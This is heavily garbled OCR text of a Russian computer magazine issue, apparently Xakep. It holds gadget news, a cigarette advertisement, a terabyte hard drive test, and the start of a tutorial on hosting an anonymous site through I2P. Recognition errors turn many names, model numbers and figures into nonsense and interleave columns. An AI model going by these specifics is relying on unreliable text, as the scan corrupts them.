сайта. Самой взламываемой ОС оказалось семейство Ыпих с веб- 
сервером АрасНе. 



► 012 
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ЗАМЗІШб 6АІ.АХѴ ТАВ ТОНЬШЕ, НЕМ ІРАй 2 



На выставке СТІА компания Затзипд представила два новых планшетных 
ПК, работающих под управлением АпсІгоісІ 3.0 (НопеусоплЬ). Анонс получил- 
ся громким.таккакСаІахуТаЬ 10.1 и 0а1ахуТаЬ8.9 сумели перещеголять 
по изяществу габаритов признанного лидера в этом вопросе — іРаб от 
Арріе. Затзипд называетсвои новинки «самымитонкими планшетными 
ПК в мире», так как при весе 595 и 470 грамм толщина корпуса составляет 
всего 8,6 мм (у іРаб — 8,8 мм]. Устройства поступят в продажу этим летом 
и их цена опять же сопоставима с ценой іРасІ: $599 за старшую модель и 
$499 — за младшую]. Оба планшета комплектуются двухъядерным про- 
цессором 1 ГГц, дисплеями ѴѴХОАТРТ І_СР (1280x800], а также слотом для 
тісгоЗО карт (до 32 Гб]. Две камеры (3 Мп основная с автофокусом и І_ЕО- 
вспышкой и 2 Мп фронтальная] дают возможность снимать качественное 
Риіі НО видео, совершать видеозвонки и проводить видеоконференции. 

По части беспроводных интерфейсов тоже все отлично: поддерживаются 
В1ие1:оо1:Ь 2.1 + ЕйП, Н5РА + 21 Мбит/сек 850/900/1 900/21 00, ЕО0Е/0РР5 
850/900/1800/1900, ѴѴі-Еі 802.1 1 (а/Ь/д/п]. Также «под капотом» устройств 
имеются гироскоп, акселерометр, компас, датчикосвещенности и 5ІМ- 
слот. Аккумулятор 6800 мАч должен обеспечивать до 1 0 часов в режиме 
просмотра видео. В обеих моделях будут предустановлены службы Реасіегз 
НиЬ и Мизіс НиЬ, гарантирующие постоянный доступ болеечем к 2 200 000 
электронных книг, 2 000 газет на 49 языках, 2 300 журналам на 22 языках и 




13 000 000 песен. Также после выхода планшетов в п родажу обещают вы- 
пуститьи широкий набор аксессуаров: В Іи еіюобѵ гарнитуру с вибрацией, 
которая подозрительно похожа на ручку, чехол, звуковую станцию и 115В- 
коннектордля Ва1ахуТаЬ8.9. Одним словом, всех поклонников АпсІгоісІ 
можно поздравить с достойным пополнением в семействе ОаІахуТаЬ. 



НЕПРИЯТНОСТИ 

«ВКОНТАКТЕ» 

Оамая-самая российская социальная сеть 
за последний месяц неоднократно «всплы- 
вала» в ОМИ, и поводы были не совсем 
радужные. 

Он а чал а «ВКонтакте» занесли в список 
самых крупных пиратских точек в мире. 
Данный анти-топ составлялся Внешнетор- 
говым ведомством США, и помимо нашей 
социальной сети туда попали Савеловский 
рынок, рынок «Петровка», многочисленные 
клоны АІЫтрЗ и Риігаскег. 

Затем «ВКонтакте» появился в прессе 
опять, на этот развсвязистем, что пред- 
ставители нескольких крупных проектов (в 
том числе генеральный директор компа- 
нии «Бегун», основатель «Групон Россия» 
и заместитель генерального директора 
корпорации «Росбизнесконсалтинг») 
опубликовали обращение к администрации 
и акционерам социальной сети стребова- 
нием удалить с серверов порно- материалы. 
Цитата из обращения: «Нежелание 
«ВКонтакте» всерьез заняться вопросом 
фильтрации выглядит как использование 
противоправного контента для привлече- 
ния внимания к проекту. То есть реклама за 
счетпорно, пропаганды насилия, национа- 
лизма, расизма». Администрация соци- 
альной сети в ответ на эти заявления пока 
традиционно молчит. 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ!! 
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МЕ6АЫЕШ5 



НОВЫЙ РИДЕР НА ТЕТ-МАТРИЦЕ 



Известный на российском рынке производитель 
электронных книг — компания ѴѴехІег — выпусти- 
ла новый ридер ѴѴЕХБЕР.ВООКТ7002. Устройство 
отличается от большинства «читалок» тем, что по- 
строено на 7.0” ТЕТ-матрице с БЕБ подсветкой. Как 
известно, у ридеров на базетехнологии электронных 
чернил с цветопередачей и подсветкой все обстоит 
не особенно хорошо. Первое практически отсут- 
ствует (цветные электронные чернила до сих пор 
демонстрируют в основном на выставках], а второе 
нередко ухудшает качество изображения. Для мно- 
гих пользователей эти минусы весьма существенны, 
а электронных книг, базирующихся не на Е-іпк, не 
так много. Новинка от ѴѴехІег, по сути, являет собой 
планшетный ПК с ограниченным функционалом. С 
девайса можно не только читать электронные книж- 
ки во всевозможных форматах (апзі, Іхі, рбГ, Ыті, 

ГЬ2, рбЬ, ери Ь] , но и слушать музыку/аудиокниги 
(трЗ, ѵѵта, Пас, ААС], смотреть видео (ѵѵтѵ, гт, аѵі, 
гтѵЬ, Здр, Гіѵ, тр4, тред, ткѵ) и просматривать изо- 
бражения [іред, Ьтр, діГ]. Кстати, можно будет даже 



поиграть в простейшие игры :). Но, разумеется, при 
использовании БОБ-дисплея сразу же встает вопрос 
энергопотребления. ТЕТ-матрица ѴѴЕХБЕР.ВООК 
Т7002 потребляет немного. При чтении книг полного 
заряда батареи хватает на 7 часов, при просмотре 
видео — более чем на 5 часов, а при прослушива- 
нии аудиофайлов (при выключенном экране] — до 
30 часов. Новинка оснащена встроенной памятью 
на 4 Гб, позволяющей вместить в себя огромную 
библиотеку — до 200 000 книг. При желании память 
можно расширить до 20 Гб за счет внешних карточек 
формата МісгоЗО. Загрузка контента в устройство 
осуществляется традиционно — через тті-БЗВ ка- 
бель, который входит в комплект поставки. ѴѴЕХБЕВ. 
ВООКТ7002 выполнен в эргономичном корпусе и 
поставляется в обложке из искусственной кожи. 
Устройство предлагается в семи цветовых вариан- 
тах: белый, черный, розовый, желтый, синий, крас- 
ный и цвет лайма. Ну и в заключение стоит сказать 
о цене. Стоимость новинки, прямо скажем, радует: 
всего 4 599 рублей. 




» Вице-президент Моііііа Джей Салливан назвал АсІоЬе Па$Н «тюрьмой для 
веб-браузеров» и заявил, что наиболее частая причина сбоев в работе 
НгеТох - это именно Ріазіі. Выход из ситуации Салливан видит в переходе на 
НТМІ.5. 



ИОКІА Х1-00: 61 ДЕНЬ ОТ ОДНОГО ЗАРЯДА 
АККУМУЛЯТОРА 




Весьма оригинальныйтелефон анон- 
сировала финская компания ІЧокіа. 

На фоне десятков разнообразных 
смартфонов эта «трубка» выглядит 
особенно ярко. XI -00 базируется на 
платформе Зегіез 30 и ориентируется 
на весьма многочисленную аудито- 
рию, которая чихать хотела на все эти 
смартфоны и считает, что телефон 
должен звонить и долго работать от 
одного заряда аккумулятора. ІЧокіа 
обещает, что аккумулятора емкостью 
1320 мАч хватит на 61 день (!) автоном- 
ной работы. Конечно, цифра опреде- 
ленно приукрашена, но даже месяц 
автономной работы — уже неплохо, 
неправдали?Вместесэтим новинка 
позиционируется и каксвоеобразная 
замена трЗ-плееру. Устройство имеет 
кнопки управления музыкальным 
проигрывателем, обладает громким 
динамиком, ЕМ-радиоприемником, 



стандартным разъемом для подклю- 
чения наушников и слотом для карт 
памяти формата тісгоЗБ (поддер- 
живаются носители объемом до 1 6 
Гб]. В комплекте также поставляются 
наушники. В аппарате предусмо- 
трены пять раздельныхтелефонных 
книг, чтобы им могли пользоваться 
несколько человек, органайзер, 
менеджер сообщений, примитивные 
игры и прочие «свистелки». Немало- 
важно, что цена XI -00 составит всего 
€35. ІЧокіа ориентировала аппарат на 
страны Восточной Европы, где такая 
стоимость отнюдь не кажется низкой, 
и одним телефоном частенько пользу- 
ется сразу несколько человек (отсюда 
и несколько телефонных книг]. В 
продаже аппарат появится уже в этом 
месяце. Будут доступны три цветовых 
варианта — оранжевый, синий и 
темно-серый. 



► 014 
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РЕКЛАМА 





ГАРМОНИЯ В ДЕТАЛЯХ. 



Узнай больше на ш/ѵѵ.ІтІаЬ.ги 



Мягкий вкус. Мировое качество. 

Неизменная цена*. 



Максимальная розничная цена 31 рубль за пачку в период с июня 2010 года по настоящее время. 



МИНЗДРАВСО 

реи 



о, 



ЗВИТИЯ РОССИ 



о: 

"Н 



'ПРЕДАЕТ: 



Е 



о: 

■ Н 



ИТ ВАШЕМУ ЗДОРОВЬЮ 






Тестовый стенд: 



■ Процессор: Іпіеі Соге 2 Оио Е4700, 3500 МГц 
Системная плата: АЗІІ5 Р50С 
Оперативная память: 2x1024 Мб, Кіпдзіоп 
00К2,800МГц 

Видеокарта: ЙѴІОІА СеГогсе 9800 ОТ 
Блок питания: 430 Вт, ТІіегтаІІаке 
Операционная система: МісгозоЙѴѴіпбоѵѵз 7 
Шіітаіе х32 



ЖЕСТКИЕ ТЕРАБАЙТЫ 

Тестирование жестких дисков объемом от 1 Тб 

о Жесткий диск - это не только место для хранения твоих файлов, но и 
важный компонент ПК, от которого зависит надежность его работы и 
производительность. Но, конечно, во многом объем прежде всего. 
Недостижимый когда-то рубеж в терабайт уже покорен и доступен 
каждому. Вот мы это и проверили. 



Технологии 

При сборе или выборе компьютера 99% пользователей в первую 
очередь обращают внимание на процессор, потом уже - на память и 
видеоплату. Конечно, это всетоже важные компоненты, но не думать о 
жестком диске (тем более, что он тоже влияет на производительность 
ПК] — нельзя, также как и приобретать его по остаточному принципу. В 
большинстве системных блоков установлен один жесткий диск, а зна- 
чит, он должен быть нетолько емким и быстрым, но и надежным, ведь 
на нем будут храниться всетвои данные! Поэтому такой параметр, 
как МТВР, то есть время наработки на отказ, очень важен. Это что 
касается надежности. Говоря о производительности, нужно помнить, 
что интерфейс 5АТА в очередной раз обновился и теперь представлен 
версией 3.0, которая очень быстрая, но должна поддерживаться не 
только жестким диском, но и системной платой. Тут нужно сказать, что 
пока ни один ИОО из данного сегмента (для домашних ПК] не может 
полностью использовать возможности 5АТА III, но вскоре ситуация 
изменится. Немаловажен и такой параметр, как скорость вращения 
шпинделя. Обычно она составляет 7200 оборотов в минуту, но сейчас 
многие производители снижаютее до 5400 в целяхуменьшения 
энергопотребления, шума и вибрации. Кстати, несмотря на то, что 
обычно основной шум производят кучи вентиляторов, расположенные 



в системном блоке, жесткий дисктакже может быть весьма шумным, 
особенно под нагрузкой. Так что последние параметры тоже важны. Не 
стоитзабывать и о том, что у каждого жесткого диска есть кэш-память, 
которая также оказывает влияние на производительность. Средний 
объем сегодня равен 32 Мб (1 6 Мб — это очень мало], но можно найти 
и модели с кэшем объемом 64 Мб. Ну и не стоитзабывать отом, что 
сегодня в каждой системной плате есть РАЮ-контроллер, а значит 
- возможно, ты скоро приобретешь второй жесткий диск и создашь 
РАЮ-массив, быстрый и надежный. 

Методика тестирования 

Каждый производитель хвалит свой продукт, приводя в качестве доказа- 
тельства простыни маркетинговыхтекстов и красивых диаграмм. У про- 
давцов - свои предпочтения, удрузей-компьютерщиков — свои... Но, как 
говорится, лучше один раз протестировать, чем много раз послушать. Чем 
мы и занялись. Для начала с помощью теста, встроенного в пакет АЮА64 
(бывший І_аѵа1уз Еѵегезі:], были получены данные о скоростях линейного и 
случайного чтения и записи. В результате мы получили очень наглядные 
графики. Кроме того, мы использовали известный и популярный НО Типе 
Рго для получения средних показателей времени доступа, а также скоро- 
стей чтения и записи. 



► 016 
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НііасЬі Ое$к$+аг 
7К2000 

НО5722020АІА330 

Технические характеристики: 

Объем: 2 Тб 
Интерфейс: ВАТА II 
Объем буфера: 32 Мб 

Скорость вращения шпинделя: 7 200 об/мин 
Уровень шума: 29 дБ 
Вес: 0.74 кг 

■■■■■■■■□□ 

+ 

Жесткий диск НТасЫ Безкзііаг 7К2000 относится куниверсалам, которые 
могутхорошо проявить себя в любых областях деятельности. Его 2 Тб 
объема хватит для хранения любого контента, при этом пользователь 
сможет дол го не задумываться о том, что бы такое удалить для осво- 
бождения места. Результаты наших тестов показали, что у устройства 
хорошие показатели какслучайного чтения, так и линейного, а разтак.то 
можно на нем и в игры играть, и систему с него загружать, все будет рабо- 
тать шустро. Во многом, кстати, благодаря большому объему кэш-памяти. 
Еще одним плюсом является тот факт, что в режиме простоя НііасЫ 
Оезкзіаг 7К2000 работает практически бесшумно. 

К сожалению, того же нельзя сказать о рабочем режиме устройства: с 
момента запуска нашихтестовых программ оно начало издаватьочень 
много шума. Так что, если ты собираешься подвергать его высоким 
нагрузкам (что очень вероятно], то стоитзаранее подумать о каком-либо 
шумоподавителе в корпусе. 



НйасЫ Шга$1аг 

А7К2000 

НІІА722010СІА330 

Технические характеристики: 

Объем: 1 Тб 
Интерфейс: БАТА II 
Объем буфера: 32 Мб 

Скорость вращения шпинделя: 7 200 об/мин 
Уровень шума: 24 дБ 
Вес: 0.68 кг 

■■■■■■■■□□ 

+ 

В отличие отсвоего собрата, жесткий диск НТасЫ Шгазіаг А7К2000 
является устройством, предназначенным не для рядового домашнего 
использования, а для работы в тяжелых условиях высокопроизводитель- 
ной системы или І\ІА5. Одним из его основных достоинств является время 
наработки на отказ, поэтому кдовольно обыденной сегодня емкости в 1 Тб 
стоит отнестись спокойно, тем более, что в сравнении с НТасЫ Оезкзіаг 
7К2000 модель Шгазіаг А7К2000 быстрее в среднем процентов на де- 
сять. Крометого, кплюсам стоит отнести и кэш-памятьобъемом 32 Мб. 

Несмотря на то, что для высокопроизводительного ПКс большой нагруз- 
кой на систему хранения данных показатель шума является не самым 
важным, нужно учесть, что Шгаз1:агА7К2000 ничуть не тише своего 
собрата. Крометого, минус заключается в показателе времени доступа, 
которое весьма среднее. При той работе, на которую рассчитан диск, это 
весомый недостаток. 
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5АЛЛ51ІЫ6 

І-Ю2041ІІ 

Технические характеристики: 

Объем: 2 Тб 
Интерфейс: 5АТА II 
Объем буфера: 32 Мб 

Скорость вращения шпинделя: 5 400 об/мин 
Уровень шума: 29 дБ 
Вес: 0.65 кг 

■■■■■■■■■□ 

+ 

Несмотря нато, что жесткий дискот Затзипд вращаетсвоим шпинделем 
со скоростью всего 5 400 оборотов в минуту, его скоростные показатели, 
согласно результатам нашихтестов, находятся на оченьхорошем уровне. 
Особенно он преуспел в таких дисциплинах, как скорости линейного 
чтения и случайные чтения/записи. Также мы не можем не отметить 
такие вещи, какбуфер32 Мб, а также очень низкий уровень шума во 
время работы. Учитывая то, что все вышеперечисленное предлагается 
пользователям по очень демократичной цене, никто неудивится, что 
именно эта модель получила награду «Лучшая покупка». 

Конечно, за невысокую температуру во время работы и снижение шума 
приходится расплачиваться. В нашем случае платой стало высокое 
время доступа. Это означает, что если ты запишешь на этот диск ОС и за- 
пустишь с него же несколько программ, то достойную скорость их работы 
получишь врядли. 



Беадаіе Ваггасисіа 

Сгееп 5Т31500541А5 

Технические характеристики: 

Объем: 1.5 Тб 
Интерфейс: 5АТА II 
Объем буфера: 32 Мб 

Скорость вращения шпинделя: 5 900 об/мин 
Уровень шума: 26 дБ 
Вес: 0.655 кг 

■■■■■■■■□□ 

+ 

Еще один производитель в нашем тесте, который снизил скорость вра- 
щения шпинделя в своем устройстве, чтобы температура и уровень шума 
по время работы жесткого диска стали пониже. Этим Беадаіе Ваггасисіа 
Огееп 5Т31500541А5 похожна Эатзипд НО2041Л. Крометого, у них 
схожая цена. Нужно отметить, что в обоих случаях инженерам удались их 
задумки. Получается, что диск с такими параметрами (мало шума и тепла] 
предпочтительнее всего использовать в небольших корпусах и медиа- 
центрах. Так что если ты хочешь создать себе именно такой комп, то тебе 
стоит присмотреться к подобного типа винчестерам. 

НоЗеадаІе Ваггасисіа Огееп 5Т31 500541 АЗ имеет и недостатки. У него 
не очень хорошие результаты в тестах на линейную запись. Читает-то он 
быстро, но вот пишет — похуже. Крометого, объем все-таки 1 .5 Тб, а не 2, 
каку Затзипд. 
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ѴѴезТегп ОІдіІ'аІ 

Саѵіаг Сгееп 
\ЛЮ30Е2К$ 



ѴѴезІегп О ііаі 

Саѵіаг ВІаск 
ѴУЮ2001РА55 



Технические характеристики: 

Объем: 3 Тб 
Интерфейс: 5АТА 3.0 
Объем буфера: 64 Мб 

Скорость вращения шпинделя: 5400-7200 об/мин 
Уровень шума: 25 дБ 
Вес: 0.73 кг 



Технические характеристики: 

Объем: 2 Тб 
Интерфейс: 5АТА II 
Объем буфера: 64 Мб 

Скорость вращения шпинделя: 7 200 об/мин 
Уровень шума: 30 дБ 
Вес: 0.75 кг 



□ □□ 



□ 



+ 

Этот «троен ни к» может гордиться своими тройками: у него емкость в 3 Тб 
и интерфейс 5АТА 3.0. В комплект поставки производитель заботливо по- 
ложил ПАЮ-контроллер стаким же интерфейсом, поскольку сегодня не 
каждая системная плата может по умолчанию работать стаким диском. 
Серия ѴѴБ (Згееп славится тем, что эти диски имеют низкие показатели 
шума и энергопотребления — наш участи и к это подтвердил во всех 
тестах. Кроме того, у него хорошие показатели линейного чтения, а также 
объемный кэш - 64 Мб. 



+ 

Устройства, которые получают наш приз «Выбор редакции», действи- 
тельно являются лидерами. Поэтому о них тяжело писать - ну что сказать, 
если все хорошо? Так произошло и с этим жестким диском. Все резуль- 
таты тестов ѴѴезІегп Оідііаі Саѵіаг ВІаск на высоте: высокие скорости во 
всех испытаниях и малое время доступа. Крометого, у него солидный 
объем и большая кэш-память, что делает его идеальным устройством для 
тех, кто не хочет идти на компромиссы. 



Несмотря на вышеописанное, у устройства имеются и недостатки (кото- 
Несмотря на все объективные плюсы, цена устройства очень высока: рые, правда, не касаются его производительности, а скорее вытекают из 

за та кую сумму можно купить парудисков, причем суммарно больших нее): это высокий шум от работы и высокая цена, 
в объеме. Адва диска — это не один: на них можно, например, создать 
РАЮ-массив. Крометого, нас совсем не порадовало время доступа — это 
означает, что такой винчестер хорошо подходиттолько для хранения 
данных. 
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РЕВВІІЛЛ 



Результаты Тестов 

о НО Типе Рго Аѵегаде геаб/ѵѵ Іе, Мб/с 



о НО Типе Рго Ассезз Ііте геаб/ѵѵгііе, мс 



ѴѴезІегп Оідііаі Саѵіаг Віаск ѴѴ01 002РАЕХ 
ѴѴезІегп Оідііаі Саѵіаг Віаск Ш2001 РА55 
ѴѴезІегп Оідііаі Саѵіаг Вгееп ѴШ0Е2К5 
Зеадаіе Ваггасиба Вгееп 5Т31 500541 А5 
ЗАМЗІЖ Н0204Ш 
5АМ51ІМ6 Н0103Ш 

Нііасііі ЦИгазІаг А7К2000 Н0А72201 0ИА330 
Нііасііі Оезкзіаг 7К2000 Н05722020АЦШ0 



ѴѴезІегп Оідііаі Саѵіаг Віаск ѴѴ01 002РАЕХ 
ѴѴезІегп Оідііаі Саѵіаг Віаск Ш2001 РА55 
ѴѴезІегп Оідііаі Саѵіаг Вгееп ШЗОЕ/РЗ 
Зеадаіе Ваггасиба Вгееп ЗТЗІ 500541АЗ 
ЗАМЗІЛѴВ Н02041Л 

ЗАМзиивноюзш 

Нііасііі Шігазіаг А7К2000 Н0А72201 0ИА330 
Нііасііі Оезкзіаг 7К2000 НО372202ІШ330 



В этом тесте Беадаіе Ваггасисіа Огееп показал себя не 
лучшим образом 



0 5 10 

ѴѴезІегп Оідііаі Саѵіаг Віаск всех опередил 
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АЮА 64 Ыпеаг Реасі ѴѴезІегп Оідііаі Саѵіаг Сгееп \ЛЮ30Е2Р5 АЮА 64 Ыпеаг Реасі 5АМ5ШМС Н0204Ш 







я ч » и л- 




АЮА 64 Ыпеаг Реасі ѴѴезІегп Оідііаі Саѵіаг Віаск ѴѴ02001РА55 



АЮА 64 Ыпеаг РеасІ Нііасііі Шігазіаг А7К2000 
НІІА722010СІА330 




АЮА 64 Ыпеаг РеасІ Зеадаіе Ваггасисіа Сгееп 5Т31500541 А5 

Заключение 

Любоетестирование рано или поздно заканчивается, настаетвремя под- 
ведения итогов. Современные емкиежесткие диски нам понравились, все 



АЮА 64 Ыпеаг Реасі Нііасііі Оезкзіаг 7К2000 НОБ722020АІА330 

они показали достойные результаты. А луч ши ми моделями стали 5а тзііпд 
НР2041ІІ, отмеченный наградой «Лучшая покупка», и ѴѴезІегп ОідіТаІ Саѵіаг 
Віаск ѴѴР2001 РА55, ставший «Выбором редакции». Такчто сегодня проблема 
не втом, что на диске мало места, а втом, чтобы правильно выбрать НРР. т 
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АНОНИМНЫЙ 

хостинг 

ЧЕРЕЗ І2Р 



Практические 

сбветы 

по использованию 
криптосети 




ѳ Наша задачка на сегодня - анонимно разместить сайт в интернете. 
Есть не так много технологий, которые нам в этом деле смогут по- 
мочь. Но одним из самых технологичных решений, которое предо- 
ставляет возможность анонимного хостинга, практически исключая 
возможность определения, где на самом деле находится сервер с 
файлами, является І2Р. 



І2Р Ѵ5 Тог 

Итак, что такое І2Р? Технологию лучше всего воспринимать как 
дополнительный сетевой уровень, который работает поверх при- 
вычного протокола ІР и предоставляет возможности для ано- 
нимной передачи данных. В І2Р используются различные виды 
криптографии для безопасной передачи сообщений и многочис- 
ленные реаг-іо-реаг туннели, на основе которых обеспечивается 
анонимность и отказоустойчивость системы. Мы уже не раз упо- 
минали І2Р на страницах журнала, но никогда не останавлива- 
лись на ее работе подробно. Да и мало кто имел с ней дело. Куда 
большую известность в области анонимизации получила раз- 
работка Тог. Поэтому, рассказывая про то, как работает І2Р, мы 
будем проводить некоторые сравнения этих двух технологий. 

Обе системы, І2Р и Тог, используют многоуровневую крипто- 



графию, чтобы посредники не могли дешифровать содержание 
передаваемых через них пакетов. Единственное, что известно 
для каждого узла — это следующее звено в цепочке передачи 
данных. В то время как Тог больше сфокусирован на сохранении 
инкогнито клиента во время серфинга в интернете, задача І2Р 
заключается в создании анонимной сети, объединяющей под- 
ключившихся пользователей. И хотя возможность анонимного 
серфинга все-таки есть (с использованием специальных шлюзов, 
которые имеют доступ «наружу», о чем ты можешь прочитать во 
врезке), главное ее назначение — это анонимный хостинг серви- 
сов. 

Речь идет в первую очередь о размещении в сети веб-сайтов, 
которые в терминологии І2Р называются еерзііез. Это чем-то 
напоминает концепцию НісИеп Эегѵісез, доступную пользовате- 
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Построение цепочки для передачи данных 




Интерфейс для управления І2Р 

лям Тог, но анонимный хостинг в І2Р работает значи- 
тельно быстрее. Это уже не жалкая попытка, а дей- 
ствительно работающая технология для размещения 
сайтов, надежная и устойчивая. 

В І2Р нет никаких центральных серверов и нет при- 
вычных ВЫЭ-серверов, но зато используется распре- 
деленная хеш-таблица йНТ (ВізІхіЬіЛесІ НазЬ ТаЫе], 
построенная на базе Кабетііа. Такой подход позволя- 
ет устранить серьезную точку отказа системы. Мы все 
помним историю, когда в 2007 году в Китае файрво- 
лом был перекрыт доступ к главной директории сер- 
висов Тог. То, что І2Р опирается на пиринговую техно- 
логию для обмена информацией о роутинге, позволя- 
ет избежать подобных проблем. Система, с помощью 
которой пользователи І2Р получают информацию друг 
о друге, называется ЫеШВ. Каждый участник сети 
является роутером, через который передается тран- 
зитный трафик, поэтому, вообще говоря, в системе 
нет какой-либо заметной разницы между сервером и 
обычным клиентом. 

Адресация в І2Р 

Для обращения к другим роутерам и сервисам не 
используются ІР’шники, адресация осуществляется 
с помощью специального криптографического иден- 
тификатора, посредством которого обозначаются как 
роутеры, так и конечные сервисы. К примеру, иденти- 
фикатор ѵѵѵѵѵѵ. і 2 р 2 . і 2 р (главного сайта проекта внутри 
сети І2Р) выглядит так: 

-КК6яу^РМХо^РЗи22Ѵ5МІ5аКу4игісКкНи20х95уХ52 

[ . . . вырезано . . . ] 

е9МУкІяѵгКѵЦА1:1і55ме0Мк1:бх1ЕсІІіВя§6хХОуІАААА 

Таким образом, для точки назначения используется 
516 байт в Вазе64. Очевидно, что подобный иденти- 
фикатор едва ли можно назвать удобным. 

К тому же он не будет работать с некоторыми прото- 



колами (в том числе НТТР). Поэтому І2Р предлагает 
еще один путь для именования идентификаторов 
— он называется «Вазе 32 Ыатез» и довольно схож 
с правилами составления имен .опіоп в сети Тог. 
Изначальный 516-байтовый идентификатор декоди- 
руется (с заменой некоторых символов) в исходный 
гаѵѵ-вид. Полученное значение хешируется с помо- 
щью 5НА256 и после этого кодируется в Вазе32. В 
конце концов к результату прибавляется .632. 12р. Что 
получается в итоге? Вполне пригодная к использова- 
нию последовательность символов. Если проделать 
операцию для оригинального идентификатора ѵѵѵѵѵѵ. 
І2р2.і2р, то получится следующее: 

г]'хыЬ5ы42]Ііѵ42 5р1та6зт-Р5пг24е4утѵѵЬуссІ35Ы§ііпЬ 

ѵ§7о§а . Ь32. І2р 

С такой формой работать уже гораздо проще. В І2Р 
нет какого-то официального аналога ВЫЭ-сервера, 
который выполнял бы резолвинг имен (то есть уста- 
навливал соответствие между доменом <зотепате>. 
і2р и идентификатором), так как это была бы серьез- 
ная точка отказа всей системы. Каждая нода І2Р 
имеет собственный набор текстовых файлов, в кото- 
рых выполнен маппингдля сервисов. Эти файлы 
очень похожи на привычный нам конфиг Н05Т5. Тем 
не менее, пользователь может синхронизировать 
свою базу «привязок» через специальный сервер 
подписки внутри І2Р. При этом он исключительно 
доверяет владельцу такого сервиса, полагая, что тот 
предоставляет ему «правильные» идентификаторы. 

Защитные механизмы 

В І2Р реализовано несколько интересных техноло- 
гий для устранения возможности перехвата и под- 
мены трафика. В то время как в Тог используется 
одна цепочка для выполнения коммуникаций, І2Р 
опирается на концепции входящих («іп») и исходя- 
щих («оиЫ туннелей. Таким образом, запросы и 
ответы далеко не всегда идут по одному и тому же 
пути. Во время передачи сообщение подвергается 
многоуровневому шифрованию (сквозное, тун- 
нельное и транспортного уровня), а конечные узлы 
обозначаются криптованными идентификаторами. 
Более того, сами туннели перестраиваются каждые 
десять минут. 

Помимо этого в І2Р используется «чесночная марш- 
рутизация» (Ѳагііс гоиііпд). По сути, это многослой- 
ное шифрование, которое позволяет единственному 
сообщению (так называемому «чесноку») содержать 
в себе множество «зубчиков» — полностью сфор- 
мированных сообщений с инструкциями для их 
доставки. В один «чеснок» в момент его формиро- 
вания перед отправкой закладывается множество 
«зубчиков», являющихся зашифрованными сообще- 




Даже если 
ничего не 



хостить, через 
тебя все равно 
будут переда- 
ваться данные 




> СІѴСІ 



Видеодемонстрация 
того, как настроить 
анонимный хостинг, 
ждеттебя на диске. 




Как обратиться к 
1 2 Р-са йту из инета? 
Можно использо- 
вать специальный 
прокси: ЬЦр5 :// 
ѵѵѵѵѵѵ.аѵѵхспх.сіе/ 
сді-Ьіп/ргохѵ2/прб- 
ргоху.сд І/000000А/ 
Шр/<адрес сервера> 
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Информация о пирах — лучшая иллюстрация 
Р2Р-природы сети І2Р 



ниями как нашего узла, так и чужих — транзитных. Является 
ли тот или иной «зубчик» в «чесноке» нашим сообщением или 
это чужое транзитное сообщение, которое проходит через нас, 
знает только тот, кто создал «чеснок». Никто иной получить эту 
информацию не может. 

Такой сложный подход обеспечивает высокий уровень защиты 
данных, но при этом не ограничивает возможности использова- 
ния І2Р. В сети могут быть размещены самые разные сервисы: 
ІРС, ВТТоггепТ ейопкеу, Етаіі. 

К тому же разработчики І2Р предоставляют АРІ для создания 
новых приложений, которые работают через защищенную сеть, 
но не требуют от пользователя дополнительно устанавливать и 
настраивать І2Р-клиент. 

Установка клиента 

Раз уж речь зашла про установку клиента, то перейдем к 
практической части нашего материала. І2Р написан на Заѵа, 
а потому запустить приложение можно практически на любой 
ОС — лишь бы в системе была установлена Заѵа-машина. 
Дистрибутив клиента снабжен удобным инсталлятором, кото- 
рый все сделает за тебя. После окончания установки перейди 
в каталог с приложением и запусти его демон. Все управление 
осуществляется через веб-оболочку, которая доступна по адре- 
су 127.0.0.1 :7657/іпсІех.І5р. С ней мы и будем работать дальше. 
Чтобы иметь возможность посещать ресурсы І2Р и внешние 
ресурсы интернета (на анонимных условиях), лучше сразу про- 
писать в браузере НТТР-прокси: 127.0.0.1:4444. Вот и вся уста- 
новка. Добавить нечего. 

Анонимный хостинг веб-сайта 

Итак, поскольку одно из главных предназначений І2Р — созда- 
ние условий для полностью анонимного хостинга, то разумно 
начать нашу практику именно с этого момента. Сайт, раз- 
мещенный внутри І2Р, называется еерзііе. Да, он не будет 
доступен широкой общественности через интернет, но к нему 
всегда смогут обратиться пользователи І2Р и при желании 
сделать зеркало ресурса в глобальной Сети. При этом теоре- 
тически (и это вопрос для отдельного обсуждения, к которому 
мы вернемся в конце статьи) выявить твой настоящий ІР-адрес 
будет чрезвычайно сложно. Предлагаю тебе ниже зіер-бу-зіер 
инструкцию по размещению сайта через І2Р. 

1 . Если ты зайдешь на страницу 1 27.0.0. 1 : 76 58, то увидишь 
сайт-заглушку. Это заготовка для еерзііе, которую мы и будем 
использовать. Все, что нужно — это отредактировать или заме- 
нить файлы в ~/.і2р/еерзіІе/сІосгооі/ ( Ы п их) и %АРРОАТА%\І2Р\ 
еерзііе\сІосгоо1;\ (ѴѴіпсІоѵѵз). Это стандартная папка для веб- 
демона ^еііу, который был установлен вместе с 1 2 Р : именно он 
сейчас принимает подключения на 7658 порту. Тут надо пони- 
мать, что на данный момент это просто локальный сайт. Чтобы 
он стал доступен пользователям, в сети І2Р для него необходи- 
мо создать соответствующий туннель. 

2 . К счастью, у нас есть и заготовка для туннеля. Если зайти в 
админку для управления туннелями (127.0.0.1:7657/і2рІиппеІ), 
то в разделе «Серверные І2Р-туннели» ты увидишь запись «І2Р 




Менеджер туннелей 

ѵѵеЬзегѵег» — это как раз то, что нужно. Сейчас туннель выклю- 
чен. Заходим в его настройки. Первое, на что стоит обратить 
внимание, это параметр «Локальный адрес назначения» (Іосаі 
сіезііпаііоп) и его значение, представляющее собой что-то 
вроде «Е94ИсІ-ѵ5О7С0ѵ~4\л/исІѴ5аѴѴ[.. вырезано. ,.]АААА». Эта 
длиннющая строка в Вазе64 и есть ключ, который используется 
для адресации внутри І2Р-сети. Что-то вроде ІР-адреса. Для 
удобства его можно куда-нибудь скопировать — он нам еще 
понадобится. К тому же самое время перевести его в читаемый 
Вазе32-вид (смысл этой операции мы описали выше) с помо- 
щью несложного Руібоп-скрипта (ищи его на диске). Указав 
оригинальный идентификатор в качестве ключа, на выходе из 
скрипта мы получим ключ вроде «ге ку7 Ь4Ь рЗ Ьзссіѵѵоѵд Ь2ѵ1;сІ Ьѵ 
изѵрб24и зЬуреб и о і д и42 рЗѵ5ц . Ь32. і 2р». Если бы туннель сейчас 
был запущен, то другие пользователи могли бы к нему подклю- 
читься, используя этот адрес. Но активировать туннель рано, 
